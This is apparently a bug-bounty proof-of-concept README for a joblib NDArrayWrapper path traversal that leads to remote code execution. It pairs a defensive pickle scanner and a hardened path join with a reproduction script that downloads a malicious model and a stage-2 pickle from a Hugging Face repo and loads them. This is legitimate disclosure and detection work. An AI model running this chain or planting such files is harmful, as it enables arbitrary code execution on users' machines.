# joblib NDArrayWrapper Path Traversal PoC
Security research PoC for huntr MFV submission.
Vulnerability: `NDArrayWrapper.read()` in `joblib/numpy_pickle_compat.py` takes `self.filename` straight out of the pickle, passes it unsanitised to `os.path.join()`, and then calls `numpy.load(filename, allow_pickle=True)`. A filename such as `../payload.npy` therefore escapes the model directory and loads an attacker-placed pickle, which executes during `joblib.load()`.

Affected version: joblib 1.5.3 (latest at time of writing)
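To make the traversal concrete without executing anything, here is an added example (not code from this PoC repo or from joblib): the unsanitised join the description attributes to `NDArrayWrapper.read()` next to a hardened join, plus a static scanner that walks pickle opcodes with `pickletools.genops` and reports every `NDArrayWrapper` filename, so a suspect `.joblib` file can be checked before it is ever unpickled. The wrapper's state layout (a `filename` key set via `BUILD`) and the sample records built by `build_sample()` are constructed for the example; the check assumes array side files are only legitimate inside the model directory.

```python
# Added example: static detection of NDArrayWrapper path traversal, no unpickling.
import os
import pickle
import pickletools
import struct

WRAPPER = ("joblib.numpy_pickle_compat", "NDArrayWrapper")
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def resolve_like_joblib(dirname, filename):
    """The join described above: os.path.join keeps '..' components and lets an
    absolute second argument replace dirname entirely, so the pickle picks the file."""
    return os.path.join(dirname, filename)


def resolve_safely(dirname, filename):
    """Hardened join (assumption: side files must live inside the model directory).
    Symlinks are resolved first, then the result must still sit under dirname."""
    base = os.path.realpath(dirname)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"array file escapes model directory: {filename!r}")
    return target


def escapes(dirname, filename):
    """True if resolve_safely() would reject filename for this model directory."""
    try:
        resolve_safely(dirname, filename)
    except ValueError:
        return True
    return False


def find_wrapper_filenames(data):
    """Return the 'filename' value of every NDArrayWrapper in a raw pickle stream.

    Only opcodes are inspected (pickletools.genops), so hostile input is safe to scan.
    Handles GLOBAL (protocol <= 3) and STACK_GLOBAL (protocol >= 4) class references.
    """
    names = []
    strings = []          # every string pushed so far; STACK_GLOBAL uses the last two
    in_wrapper = False    # between the NDArrayWrapper reference and its BUILD
    want_value = False    # the previous string was the 'filename' key
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST") and tuple(arg.split(" ", 1)) == WRAPPER:
            in_wrapper = True
        elif op.name == "STACK_GLOBAL" and tuple(strings[-2:]) == WRAPPER:
            in_wrapper = True
        elif op.name in STRING_OPS:
            strings.append(arg)
            if in_wrapper and want_value:
                names.append(arg)
                want_value = False
            elif in_wrapper and arg == "filename":
                want_value = True
        elif op.name == "BUILD":          # state applied; this wrapper is complete
            in_wrapper = want_value = False
    return names


def suspicious_wrapper_filenames(data, dirname="."):
    """Wrapper filenames that would resolve outside dirname: the traversal signature."""
    return [n for n in find_wrapper_filenames(data) if escapes(dirname, n)]


def build_sample(filename, stack_global=False):
    """Hand-assemble a minimal compat-format record (constructed for this example;
    real joblib files carry more state). Protocol 2 uses GLOBAL, protocol 4 STACK_GLOBAL."""
    def uni(s):
        raw = s.encode("utf-8")
        return pickle.BINUNICODE + struct.pack("<I", len(raw)) + raw
    if stack_global:
        head = pickle.PROTO + b"\x04" + uni(WRAPPER[0]) + uni(WRAPPER[1]) + pickle.STACK_GLOBAL
    else:
        head = pickle.PROTO + b"\x02" + pickle.GLOBAL + b"%s\n%s\n" % tuple(w.encode() for w in WRAPPER)
    state = pickle.EMPTY_DICT + uni("filename") + uni(filename) + pickle.SETITEM
    return head + pickle.EMPTY_TUPLE + pickle.NEWOBJ + state + pickle.BUILD + pickle.STOP


if __name__ == "__main__":
    evil = build_sample("../payload.npy")
    print(find_wrapper_filenames(evil))                      # ['../payload.npy']
    print(suspicious_wrapper_filenames(evil, "/tmp/poc_model"))  # ['../payload.npy']
    print(escapes("/tmp/poc_model", "../payload.npy"))       # True
```

The scanner expects raw pickle bytes, so decompress a compressed joblib file before feeding it in. Note also that `resolve_safely()` only closes the traversal: a side file inside the model directory is still loaded with `allow_pickle=True`, so the only real defence against a hostile `.joblib` is not to load it at all.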
## Files

- `evil.joblib`: malicious model file (an `NDArrayWrapper` with `filename="../payload.npy"`)
- `payload.npy`: stage-2 RCE pickle (place it one directory above `evil.joblib`)
## Reproduction

```bash
pip3 install joblib==1.5.3 numpy huggingface_hub
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
# stage 2 goes one directory above the model file so '../payload.npy' resolves to it
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
# the load may raise once the payload has run; ignore it and check for the proof file
try: joblib.load('/tmp/poc_model/evil.joblib')
except Exception: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"
```